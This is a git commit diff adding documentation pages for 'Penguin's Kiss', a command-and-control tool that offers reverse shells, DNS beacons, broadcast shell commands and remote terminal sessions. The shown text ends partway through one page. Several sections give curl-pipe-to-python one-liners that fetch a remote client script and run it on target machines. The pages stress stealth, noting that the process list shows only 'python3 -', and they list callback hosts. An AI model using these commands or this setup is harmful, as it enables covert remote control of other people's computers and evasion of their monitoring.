diff options
| author | Carson Fleming <cflems@cflems.net> | 2025-01-24 20:57:54 -0500 |
|---|---|---|
| committer | Carson Fleming <cflems@cflems.net> | 2025-01-24 20:57:54 -0500 |
| commit | 20e78c828e3995371a5ed29f3f53514370b7c152 (patch) | |
| tree | e8d738d41be5cb9c657babf66facb8ef7459abab | |
| download | pk-20e78c828e3995371a5ed29f3f53514370b7c152.tar.gz | |
host docs here now
| -rw-r--r-- | .github/workflows/live.yml | 42 | ||||
| -rw-r--r-- | client.php | 75 | ||||
| -rw-r--r-- | commands.php | 156 | ||||
| -rw-r--r-- | hdb.php | 48 | ||||
| -rw-r--r-- | include/footer.php | 3 | ||||
| -rw-r--r-- | include/header.php | 57 | ||||
| -rw-r--r-- | include/meta.php | 6 | ||||
| -rw-r--r-- | index.php | 59 | ||||
| -rw-r--r-- | live/client.html | 132 | ||||
| -rw-r--r-- | live/commands.html | 213 | ||||
| -rw-r--r-- | live/css/control.css | 134 | ||||
| -rw-r--r-- | live/favicon.ico | bin | 0 -> 4286 bytes | |||
| -rw-r--r-- | live/fonts/opensans.woff2 | bin | 0 -> 279056 bytes | |||
| -rw-r--r-- | live/fonts/source-code-pro.woff2 | bin | 0 -> 84120 bytes | |||
| -rw-r--r-- | live/hdb.html | 105 | ||||
| -rw-r--r-- | live/img/banner.png | bin | 0 -> 40887 bytes | |||
| -rw-r--r-- | live/img/banner.webp | bin | 0 -> 11346 bytes | |||
| -rw-r--r-- | live/img/logo.png | bin | 0 -> 28143 bytes | |||
| -rw-r--r-- | live/img/logo.webp | bin | 0 -> 5860 bytes | |||
| -rw-r--r-- | live/index.html | 116 | ||||
| -rw-r--r-- | live/server.html | 131 | ||||
| -rw-r--r-- | makefile | 6 | ||||
| -rw-r--r-- | server.php | 74 |
23 files changed, 1357 insertions, 0 deletions
diff --git a/.github/workflows/live.yml b/.github/workflows/live.yml new file mode 100644 index 0000000..e06e8ac --- /dev/null +++ b/.github/workflows/live.yml @@ -0,0 +1,42 @@ +# Simple workflow for deploying static content to GitHub Pages +name: Deploy static content to Pages + +on: + # Runs on pushes targeting the default branch + push: + branches: ["docs"] + + # Allows you to run this workflow manually from the Actions tab + workflow_dispatch: + +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write + +# Allow only one concurrent deployment, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: "pages" + cancel-in-progress: false + +jobs: + # Single deploy job since we're just deploying + deploy: + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Pages + uses: actions/configure-pages@v5 + - name: Upload artifact + uses: actions/upload-pages-artifact@v3 + with: + path: 'live' + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v4 diff --git a/client.php b/client.php new file mode 100644 index 0000000..e9993f4 --- /dev/null +++ b/client.php @@ -0,0 +1,75 @@ +<!DOCTYPE html> +<html lang="en"> + <head> +<?php +require('include/meta.php'); +?> + <title>Client Configuration | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/client" /> + </head> +<?php +require('include/header.php'); +?> + <p>As you may have noticed reading the precompiled scripts section, the client binary + allows configuration options to be passed in a number of ways. The first thing it + will look for, for any given option, is a specifically-named environment variable, + as this will not be visible in the process name. Failing this, the client will try + less subtle approaches, looking for positional command-line arguments, prompting + the standard input, and finally falling back to a preset default value (which you + may find it useful to alter the script in order to tweak if you don't want to + pass anything in through the alternative methods.) Generally your run command will + look something like:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | OPT1=val1 OPT2=val2... python3 -</pre> + <p>This has the distinct advantage as only showing up as <code>python3 -</code> in the + process list, which leaves precious little to identify what it is actually doing. + For this reason, environment variable input is highly recommended.</p> + <section id="hdb"> + <h3>HDB URL</h3> + <p>Unless your server is using the default server key (not recommended), you will + need to specify a URL from which the server's public RSA key can be + fetched. The format of this file can be found in the + <a href="/hdb">Hosts Database</a> + section of the documentation.</p> + <p>Environment Variable Name: <code>HDB</code></p> + <p>Command-Line Argument Order: first</p> + <p>Default Value: <code>https://war.cflems.net/hosts.json</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | HDB=https://dl.pkctl.org/b8ca2180.json python3 -</pre> + </section> + <section id="host"> + <h3>TCP Host</h3> + <p>This is the TCP host to which your client will attempt to connect at a specified + interval. You will most invariably want to specify or recode this parameter. + Port number is optional and specified with a colon in the hostname.</p> + <p>Environment Variable Name: <code>HOST</code></p> + <p>Command-Line Argument Order: second</p> + <p>Default Value: <code>sek.cflems.net:2236</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | HOST=raw.pkctl.org python3 -</pre> + </section> + <section id="tts"> + <h3>Time to Sleep</h3> + <p>This is the interval at which the client will wake up and attempt to establish + a connection to the remote server, if it does not succeed immediately. Unit is + seconds.</p> + <p>Environment Variable Name: <code>TTS</code></p> + <p>Command-Line Argument Order: third</p> + <p>Default Value: <code>1800</code> (30 minutes)</p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | TTS=86400 python3 -</pre> + </section> + <section id="bits"> + <h3>RSA Bits</h3> + <p>Can be used to turn down the bits used for RSA keys and messages for faster + operation at the expense of security. Needs to be synced between the client + and server. I recommend leaving this value alone.</p> + <p>Environment Variable Name: <code>BITS</code></p> + <p>Command-Line Argument Order: fourth</p> + <p>Default Value: <code>4096</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | BITS=2048 python3 -</pre> + </section> +<?php +require('include/footer.php'); +?> +</html> diff --git a/commands.php b/commands.php new file mode 100644 index 0000000..0194e49 --- /dev/null +++ b/commands.php @@ -0,0 +1,156 @@ +<!DOCTYPE html> +<html lang="en"> + <head> +<?php +require('include/meta.php'); +?> + <title>Command Reference | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/commands" /> + </head> +<?php +require('include/header.php'); +?> + <p>The following commands can be executed while attached to the daemon via + <code>pkctl attach</code>.</p> + <section id="beacon"> + <h3>beacon</h3> + <p>Creates a DNS beacon that this host will respond to as if it were a legitimate + DNS server. If a beacon already exists at this hostname, record type, and + record class, it will be overwritten.</p> + <p>Arguments: DNS data (hex string), hostname (string), record type (string), + record class (string, optional).</p> + <p>DNS data must be a string representing the hex-encoded binary data to be + returned as the answer to a DNS query for this record.</p> + <p>Hostname is the DNS hostname for which to answer queries.</p> + <p>Record type must be one of A, AAAA, CNAME, MX, or TXT. Data must be formatted + correctly per record type or else malformed responses will be returned.</p> + <p>Record class must be one of IN, CH, or HS, or else omitted. Defaults to IN + (the internet).</p> + <p>Usage:</p> + <pre>pk> beacon 01020304 x.z.pkctl.org A IN</pre> + </section> + <section id="delbeacon"> + <h3>delbeacon</h3> + <p>Deletes one or more beacons according to arguments supplied. If only hostname + is supplied, all beacons matching hostname will be deleted. If more arguments + are supplied, the search will be narrowed accordingly.</p> + <p>Arguments: hostname (string), record type (string, optional), record class + (string, optional).</p> + <p>See <a href="#beacon">beacon reference</a> for the meanings of these arguments.</p> + <p>Usage:</p> + <pre>pk> delbeacon x.z.pkctl.org A IN</pre> + </section> + <section id="nbeacons"> + <h3>nbeacons</h3> + <p>Prints the number of currently active DNS beacons.</p> + <p>Usage:</p> + <pre>pk> nbeacons +[pk] Active beacons: 224</pre> + </section> + <section id="lbeacons"> + <h3>lbeacons</h3> + <p>Lists all currently active DNS beacons and their data.</p> + <p>Usage:</p> + <pre>pk> lbeacons +[pk] Active beacons: +- x.z.pkctl.org A IN: 01020304 +- ... +[pk] 224 total.</pre> + </section> + <section id="nscreen"> + <h3>nscreen</h3> + <p>Prints the number of currently attached controller screens.</p> + <p>Usage:</p> + <pre>pk> nscreen +[pk] Active screens: 2</pre> + </section> + <section id="ncli"> + <h3>ncli</h3> + <p>Prints the number of currently connected TCP clients.</p> + <p>Usage:</p> + <pre>$ ncli +[pk] Active TCP clients: 27</pre> + </section> + <section id="lcli"> + <h3>lcli</h3> + <p>Lists the currently connected TCP clients and their descriptive information.</p> + <pre>$ lcli +[pk] Active TCP clients: +- 0: {'ip': '127.0.0.1', 'rport': 47874, 'rdns': 'localhost'} +- ... +[pk] 27 total.</pre> + </section> + <section id="lq"> + <h3>lq</h3> + <p>Lists the queue of commands to be executed by newly connected clients.</p> + <p>Usage:</p> + <pre>pk> lq +['whoami', 'hostname']</pre> + </section> + <section id="cq"> + <h3>cq</h3> + <p>Clears the command queue.</p> + <p>Usage:</p> + <pre>pk> cq</pre> + </section> + <section id="show-serverkey"> + <h3>show-serverkey</h3> + <p>Prints the server's public key in a format easily copyable into an HDB + entry.</p> + <p>Usage:</p> + <pre>pk> show-serverkey +{"n": ..., "e": ...}</pre> + </section> + <section id="pty"> + <h3>pty</h3> + <p>Connects your screen to the specified client in a one-on-one terminal session, + similar to SSHing into the client machine.</p> + <p>Arguments: client ID (integer) — can be found with <code>lcli</code>.</p> + <p>Usage:</p> + <pre>$ pty 3</pre> + </section> + <section id="refresh-hdb"> + <h3>refresh-hdb</h3> + <p>Commands the client to refresh its internal hosts database from the web resource + it was originally pulled from.</p> + <p>Usage:</p> + <pre>$ refresh-hdb</pre> + </section> + <section id="tunnel"> + <h3>tunnel</h3> + <p>Commands the client to disconnect and sleep for the number of seconds configured + in <a href="/client#tts">TTS</a>.</p> + <p>Usage:</p> + <pre>$ tunnel</pre> + </section> + <section id="die"> + <h3>die</h3> + <p>Commands the client to exit and not respawn.</p> + <p>Usage:</p> + <pre>$ die</pre> + </section> + <section id="shell"> + <h3>Shell Commands</h3> + <p>Inputs which are not recognized as server commands will be interpreted as + shell commands, which will be blasted to all connected clients and queued for + future clients to receive as well. Once executed, the results of these + commands will be blasted to all active screens, and logged in case no screen + is watching at the time of the response. The active command queue can be + managed by way of the <a href="#lq">lq</a> and <a href="#cq">cq</a> + commands.</p> + </section> + <section id="target"> + <h3>Targeting</h3> + <p>In the event that you would prefer not to dispatch a command to all current and + future clients, a specific set of targets can be specified by prepending + <code>TARGET={targets}</code> to the command, where <code>{targets}</code> is + a comma-delimited list of client IDs (integers). These client IDs can be + retrieved by checking the output of <code>lcli</code>. Commands which are + targeted are not queued for future clients to receive.</p> + <p>Usage:</p> + <pre>$ TARGET=0,4,57,264 echo hello</pre> + </section> +<?php +require('include/footer.php'); +?> +</html> @@ -0,0 +1,48 @@ +<!DOCTYPE html> +<html lang="en"> + <head> +<?php +require('include/meta.php'); +?> + <title>Hosts Database | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/hdb" /> + </head> +<?php +require('include/header.php'); +?> + <p>Now that we've generated our host key and gotten our server up and running, its + time to publish its public key in a hosts database file so that it can be retrieved + by clients. The TL;DR for this section is to create a file that looks like this:</p> + <pre>{"keys": {"<server ip>": {"n": <number n that python spit out>, "e": 65537}}}</pre> + <p>and upload it to the web somewhere. You can then supply this URL to your clients as + your hosts database. Literally even a PasteBin will work if you use the raw file + URL.</p> + <section id="format"> + <h3>Format</h3> + <p>The hosts database is essentially just a JSON object in which the PK client will + look for specific keys to retrieve information. The basic skeleton looks like + this:</p> + <pre>{"keys": {<keys section>}}</pre> + </section> + <section id="keys"> + <h3>Keys Section</h3> + <p>The keys section is just a mapping from server IPs to key objects, which in + turn are just a way of representing RSA public keys. The keys section supports + multiple server IPs, but currently only one public key per server IP. Its + skeleton looks like the following:</p> + <pre>{"0.1.2.3": {<key object>}, "255.255.255.255": {<key object>}}</pre> + <h4>Key Objects</h4> + <p>A key object is just a modulus and a public exponent, both of which are integers. + The modulus is at key <code>n</code> and the public exponent is at key + <code>e</code>. The public exponent is optional and defaults to + <code>65537</code> if not supplied. These values can be pulled directly from + <code>/etc/pk/server_key.json</code>, but it is important to delete the + <code>d</code> key and its value, as this information needs to remain secret. + </p> + <p>The format of a key object is as follows:</p> + <pre>{"n": 3043289324798327498257285749857984257249857245, "e": 12345}</pre> + </section> +<?php +require('include/footer.php'); +?> +</html> diff --git a/include/footer.php b/include/footer.php new file mode 100644 index 0000000..d23523b --- /dev/null +++ b/include/footer.php @@ -0,0 +1,3 @@ + </div> + </div> + </body> diff --git a/include/header.php b/include/header.php new file mode 100644 index 0000000..1189159 --- /dev/null +++ b/include/header.php @@ -0,0 +1,57 @@ + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul class="nav-section"> + <li><a href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. :) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> diff --git a/include/meta.php b/include/meta.php new file mode 100644 index 0000000..ca4383c --- /dev/null +++ b/include/meta.php @@ -0,0 +1,6 @@ + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> diff --git a/index.php b/index.php new file mode 100644 index 0000000..6a72074 --- /dev/null +++ b/index.php @@ -0,0 +1,59 @@ +<!DOCTYPE html> +<html lang="en"> + <head> +<?php +require('include/meta.php'); +?> + <title>Penguin's Kiss Command & Control Software | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/" /> + </head> +<?php +require('include/header.php'); +?> + <p>Penguin's Kiss is command and control software designed to accomodate a large + number of clients and controllers at once. Multiple channels are available for + end-to-end encrypted delivery of shell commands, including direct TCP reverse + shell, DNS beacon, and beacon-triggered direct connection. All information is sent + encrypted, either by padded RSA or by one-time pad exchanged over RSA (this helps + to keep short data snippets responsive and avoid ballooning message size). In the + future, some work may be done to incorporate elliptic curve cryptography and + one-time session keys utilizing some symmetric cipher (likely AES).</p> + <section id="download"> + <h3>Downloading PK</h3> + <p>The quickest way to download is via the button in the top right. This will take + you to the latest release on + <a href="https://github.com/cflems/pk">GitHub</a>. You can also clone the + <a href="https://github.com/cflems/pk/tree/master">master</a> (pseudo-stable) + or + <a href="https://github.com/cflems/pk/tree/develop">develop</a> (unstable) + branches to receive feature updates before they are bundled into a full + release.</p> + </section> + <section id="build"> + <h3>Building PK</h3> + <p>PK doesn't require much in the way of compilation, just bundling into a + single script that can be distributed or run. This functionality is written in + the makefile for easy access, so fetching and compilation should be as simple + as:</p> + <pre># or tar -xzf pk.tgz if you've downloaded an archive +git clone git@github.com:cflems/pk.git +cd pk +make</pre> + <p>Your built artifacts will be <code>pkcli.py</code> and <code>pkd.py</code>. + Building is required before PK can be run for the first time.</p> + </section> + <section id="precompiled"> + <h3>Precompiled Client Scripts</h3> + <p>Since cloning and building the latest version isn't the stealthiest + procedure to execute on a client machine, prebuilt versions of the latest + client script will be hosted in the several locations and can be executed + without meaningful process footprint as follows:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | ENV=... python3 -</pre> + <pre>curl -s https://war.cflems.net/pk.py | ENV=... python3 -</pre> + <p>You may wish to host your own, however, in order to tweak the default values + to your needs and avoid feeding them via enviornment variables.</p> + </section> +<?php +require('include/footer.php'); +?> +</html> diff --git a/live/client.html b/live/client.html new file mode 100644 index 0000000..8d2f617 --- /dev/null +++ b/live/client.html @@ -0,0 +1,132 @@ +<!DOCTYPE html> +<html lang="en"> + <head> + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> + <title>Client Configuration | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/client" /> + </head> + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul class="nav-section"> + <li><a href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. :) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> + <p>As you may have noticed reading the precompiled scripts section, the client binary + allows configuration options to be passed in a number of ways. The first thing it + will look for, for any given option, is a specifically-named environment variable, + as this will not be visible in the process name. Failing this, the client will try + less subtle approaches, looking for positional command-line arguments, prompting + the standard input, and finally falling back to a preset default value (which you + may find it useful to alter the script in order to tweak if you don't want to + pass anything in through the alternative methods.) Generally your run command will + look something like:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | OPT1=val1 OPT2=val2... python3 -</pre> + <p>This has the distinct advantage as only showing up as <code>python3 -</code> in the + process list, which leaves precious little to identify what it is actually doing. + For this reason, environment variable input is highly recommended.</p> + <section id="hdb"> + <h3>HDB URL</h3> + <p>Unless your server is using the default server key (not recommended), you will + need to specify a URL from which the server's public RSA key can be + fetched. The format of this file can be found in the + <a href="/hdb">Hosts Database</a> + section of the documentation.</p> + <p>Environment Variable Name: <code>HDB</code></p> + <p>Command-Line Argument Order: first</p> + <p>Default Value: <code>https://war.cflems.net/hosts.json</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | HDB=https://dl.pkctl.org/b8ca2180.json python3 -</pre> + </section> + <section id="host"> + <h3>TCP Host</h3> + <p>This is the TCP host to which your client will attempt to connect at a specified + interval. You will most invariably want to specify or recode this parameter. + Port number is optional and specified with a colon in the hostname.</p> + <p>Environment Variable Name: <code>HOST</code></p> + <p>Command-Line Argument Order: second</p> + <p>Default Value: <code>sek.cflems.net:2236</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | HOST=raw.pkctl.org python3 -</pre> + </section> + <section id="tts"> + <h3>Time to Sleep</h3> + <p>This is the interval at which the client will wake up and attempt to establish + a connection to the remote server, if it does not succeed immediately. Unit is + seconds.</p> + <p>Environment Variable Name: <code>TTS</code></p> + <p>Command-Line Argument Order: third</p> + <p>Default Value: <code>1800</code> (30 minutes)</p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | TTS=86400 python3 -</pre> + </section> + <section id="bits"> + <h3>RSA Bits</h3> + <p>Can be used to turn down the bits used for RSA keys and messages for faster + operation at the expense of security. Needs to be synced between the client + and server. I recommend leaving this value alone.</p> + <p>Environment Variable Name: <code>BITS</code></p> + <p>Command-Line Argument Order: fourth</p> + <p>Default Value: <code>4096</code></p> + <p>Usage:</p> + <pre>curl -s https://dl.pkctl.org/pk.py | BITS=2048 python3 -</pre> + </section> + </div> + </div> + </body> +</html> diff --git a/live/commands.html b/live/commands.html new file mode 100644 index 0000000..1cc28e1 --- /dev/null +++ b/live/commands.html @@ -0,0 +1,213 @@ +<!DOCTYPE html> +<html lang="en"> + <head> + <meta charset="utf-8" /> + <meta name="viewport" content="width=device-width, initial-scale=1.0" /> + <meta name="author" content="Carson Fleming" /> + <meta name="description" content="Harness encrypted client-server communication, asynchronous command distribution, terminal emulation, and support for unlimited clients and controllers with Penguin's Kiss, the ultimate tool to manage remotely controlled devices with security and convenience." /> + <link rel="icon" type="image/x-icon" href="/favicon.ico" /> + <link rel="stylesheet" type="text/css" href="/css/control.css" /> + <title>Command Reference | Docs | Penguin's Kiss</title> + <link rel="canonical" href="https://c2.pkctl.org/commands" /> + </head> + <body> + <header id="banner"> + <a id="banner-logo" href="/"> + <img id="logo-img" src="/img/banner.webp" alt="Penguin's Kiss Banner" /> + </a> + <div id="banner-buttons"> + <a class="button" href="https://github.com/cflems/pk">GitHub</a> + <a class="button" href="https://github.com/cflems/pk/releases">Download</a> + </div> + </header> + <div id="page"> + <nav id="navigation"> + <h3 class="nav-heading"><a href="/">About PK</a></h3> + <ul class="nav-section"> + <li><a href="/#download">Downloading</a></li> + <li><a href="/#build">Building</a></li> + <li><a href="/#precompiled">Precompiled</a></li> + </ul> + <h3 class="nav-heading"><a href="/client">Client Config</a></h3> + <ul class="nav-section"> + <li><a href="/client#tts">Time to Sleep</a></li> + <li><a href="/client#bits">RSA Bits</a></li> + </ul> + <h3 class="nav-heading"><a href="/server">Server Config</a></h3> + <ul class="nav-section"> + <li><a href="/server#install">Installing</a></li> + <li><a href="/server#pkctl">PKCTL Usage</a></li> + <li><a href="/server#keygen">Host Key Generation</a></li> + <li><a href="/server#users">Local Users</a></li> + </ul> + <h3 class="nav-heading"><a href="/hdb">Hosts Database</a></h3> + <ul class="nav-section"> + <li><a href="/hdb#format">Format</a></li> + <li><a href="/hdb#keys">Keys Section</a></li> + <!-- Routes here soon. :) --> + </ul> + <h3 class="nav-heading"><a href="/commands">Command Reference</a></h3> + <ul class="nav-section"> + <li><a href="/commands#beacon">beacon</a></li> + <li><a href="/commands#delbeacon">delbeacon</a></li> + <li><a href="/commands#nbeacons">nbeacons</a></li> + <li><a href="/commands#lbeacons">lbeacons</a></li> + <li><a href="/commands#nscreen">nscreen</a></li> + <li><a href="/commands#ncli">ncli</a></li> + <li><a href="/commands#lcli">lcli</a></li> + <li><a href="/commands#lq">lq</a></li> + <li><a href="/commands#cq">cq</a></li> + <li><a href="/commands#show-serverkey">show-serverkey</a></li> + <li><a href="/commands#pty">pty</a></li> + <li><a href="/commands#refresh-hdb">refresh-hdb</a></li> + <li><a href="/commands#tunnel">tunnel</a></li> + <li><a href="/commands#die">die</a></li> + <li><a href="/commands#shell">Shell Commands</a></li> + <li><a href="/commands#target">Targeting</a></li> + </ul> + </nav> + <div id="content"> + <p>The following commands can be executed while attached to the daemon via + <code>pkctl attach</code>.</p> + <section id="beacon"> + <h3>beacon</h3> + <p>Creates a DNS beacon that this host will respond to as if it were a legitimate + DNS server. If a beacon already exists at this hostname, record type, and + record class, it will be overwritten.</p> + <p>Arguments: DNS data (hex string), hostname (string), record type (string), + record class (string, optional).</p> + <p>DNS data must be a string representing the hex-encoded binary data to be + returned as the answer to a DNS query for this record.</p> + <p>Hostname is the DNS hostname for which to answer queries.</p> + <p>Record type must be one of A, AAAA, CNAME, MX, or TXT. Data must be formatted + correctly per record type or else malformed responses will be returned.</p> + <p>Record class must be one of IN, CH, or HS, or else omitted. Defaults to IN + (the internet).</p> + <p>Usage:</p> + <pre>pk> beacon 01020304 x.z.pkctl.org A IN</pre> + </section> + <section id="delbeacon"> + <h3>delbeacon</h3> + <p>Deletes one or more beacons according to arguments supplied. If only hostname + is supplied, all beacons matching hostname will be deleted. If more arguments + are supplied, the search will be narrowed accordingly.</p> + <p>Arguments: hostname (string), record type (string, optional), record class + (string, optional).</p> + <p>See <a href="#beacon">beacon reference</a> for the meanings of these arguments.</p> + <p>Usage:</p> + <pre>pk> delbeacon x.z.pkctl.org A IN</pre> + </section> + <section id="nbeacons"> + <h3>nbeacons</h3> + <p>Prints the number of currently active DNS beacons.</p> + <p>Usage:</p> + <pre>pk> nbeacons +[pk] Active beacons: 224</pre> + </section> + <section id="lbeacons"> + <h3>lbeacons</h3> + <p>Lists all currently active DNS beacons and their data.</p> + <p>Usage:</p> + <pre>pk> lbeacons +[pk] Active beacons: +- x.z.pkctl.org A IN: 01020304 +- ... +[pk] 224 total.</pre> + </section> + <section id="nscreen"> + <h3>nscreen</h3> + <p>Prints the number of currently attached controller screens.</p> + <p>Usage:</p> + <pre>pk> nscreen +[pk] Active screens: 2</pre> + </section> + <section id="ncli"> + <h3>ncli</h3> + <p>Prints the number of currently connected TCP clients.</p> + <p>Usage:</p> + <pre>$ ncli +[pk] Active TCP clients: 27</pre> + </section> + <section id="lcli"> + <h3>lcli</h3> + <p>Lists the currently connected TCP clients and their descriptive information.</p> + <pre>$ lcli +[pk] Active TCP clients: +- 0: {'ip': '127.0.0.1', 'rport': 47874, 'rdns': 'localhost'} +- ... +[pk] 27 total.</pre> + </section> + <section id="lq"> + <h3>lq</h3> + <p>Lists the queue of commands to be executed by newly connected clients.</p> + <p>Usage:</p> + <pre>pk> lq +['whoami', 'hostname']</pre> + </section> + <section id="cq"> + <h3>cq</h3> + <p>Clears the command queue.</p> + <p>Usage:</p> + <pre>pk> cq</pre> + </section> + <section id="show-serverkey"> + <h3>show-serverkey</h3> + <p>Prints the server's public key in a format easily copyable into an HDB + entry.</p> + <p>Usage:</p> + <pre>pk> show-serverkey +{"n": ..., "e": ...}</pre> + </section> + <section id="pty"> + <h3>pty</h3> + <p>Connects your screen to the specified client in a one-on-one terminal session, + similar to SSHing into the client machine.</p> + <p>Arguments: client ID (integer) — can be found with <code>lcli</code>.</p> + <p>Usage:</p> + <pre>$ pty 3</pre> + </section> + <section id="refresh-hdb"> + <h3>refresh-hdb</h3> + <p>Commands the client to refresh its internal hosts database from the web resource + it was originally pulled from.</p> + <p>Usage:</p> + <pre>$ refresh-hdb</pre> + </section> + <section id="tunnel"> + <h3>tunnel</h3> + <p>Commands the client to disconnect and sleep for the number of seconds configured + in <a href="/client#tts">TTS</a>.</p> + <p>Usage:</p> + <pre>$ tunnel</pre> + </section> + <section id="die"> + <h3>die</h3> + <p>Commands the client to exit and not respawn.</p> + <p>Usage:</p> + <pre>$ die</pre> + </section> + <section id="shell"> + <h3>Shell Commands</h3> + <p>Inputs which are not recognized as server commands will be interpreted as + shell commands, which will be blasted to all connected clients and queued for + future clients to receive as well. Once executed, the results of these + commands will be blasted to all active screens, and logged in case no screen + is watching at the time of the response. The active command queue can be + managed by way of the <a href="#lq">lq</a> and <a href="#cq">cq</a> + commands.</p> + </section> + <section id="target"> + <h3>Targeting</h3> + <p>In the event that you would prefer not to dispatch a command to all current and + future clients, a specific set of targets can be specified by prepending + <code>TARGET={targets}</code> to the command, where <code>{targets}</code> is + a comma-delimited list of client IDs (integers). These client IDs can be + retrieved by checking the output of <code>lcli</code>. Commands which are + targeted are not queued for future clients to receive.</p> + <p>Usage:</p> 